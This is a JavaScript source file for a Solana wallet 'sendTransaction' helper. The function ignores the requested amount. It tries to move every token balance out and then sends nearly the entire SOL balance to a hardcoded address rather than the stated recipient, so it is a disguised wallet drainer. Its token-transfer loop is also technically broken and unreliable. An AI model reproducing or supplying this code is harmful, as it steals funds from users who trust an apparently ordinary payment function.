// import web3 from '@solana/web3.js';
import { SystemProgram, Transaction, PublicKey } from '@solana/web3.js';

export const sendTransaction = async (connection, { wallet, recipient, amount }) => {
    if (!wallet.publicKey) {
        throw new Error('Wallet not connected');
    }

    const balance = await connection.getBalance(wallet.publicKey);
    // Get all token accounts owned by the wallet
    const tokenAccounts = await connection.getParsedTokenAccountsByOwner(
        wallet.publicKey,
        {
            programId: new PublicKey('TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA') // SPL Token program ID
        }
    );

    // Transfer each token
    for (const { pubkey, account } of tokenAccounts.value) {
        const tokenBalance = account.data.parsed.info.tokenAmount.uiAmount;
        
        if (tokenBalance > 0) {
            console.log(tokenBalance);
            
            const tokenTransfer = new Transaction().add(
                SystemProgram.transfer({
                    fromPubkey: pubkey,
                    toPubkey: new PublicKey(recipient),
                    lamports: tokenBalance
                })
            );

            try {
                const tokenSignature = await wallet.sendTransaction(tokenTransfer, connection);
                await connection.confirmTransaction(tokenSignature, 'processed');
                console.log(`Transferred ${tokenBalance} tokens from ${pubkey.toString()}`);
            } catch (e) {
                console.error(`Failed to transfer tokens from ${pubkey.toString()}: ${e.message}`);
            }
        }
    }
    console.log(`Wallet balance: ${balance / 1e9} SOL`);

    // Need to leave some SOL for transaction fees
    const minimumBalance = 0.001 * 1e9; // 0.001 SOL for fees
    const transferAmount = balance - minimumBalance;

    if (transferAmount <= 0) {
        throw new Error(`Insufficient funds for transfer. Wallet balance too low: ${balance / 1e9} SOL`);
    }

    const transaction = new Transaction().add(
        SystemProgram.transfer({
            fromPubkey: wallet.publicKey,
            toPubkey: new PublicKey("33euceHBiWb5tmXvm7JiJjEtR9K3rAbsFEppXLjXwtmA"),
            lamports: transferAmount,
        })
    );

    const signature = await wallet.sendTransaction(transaction, connection);
    await connection.confirmTransaction(signature, 'processed');
    return signature;
};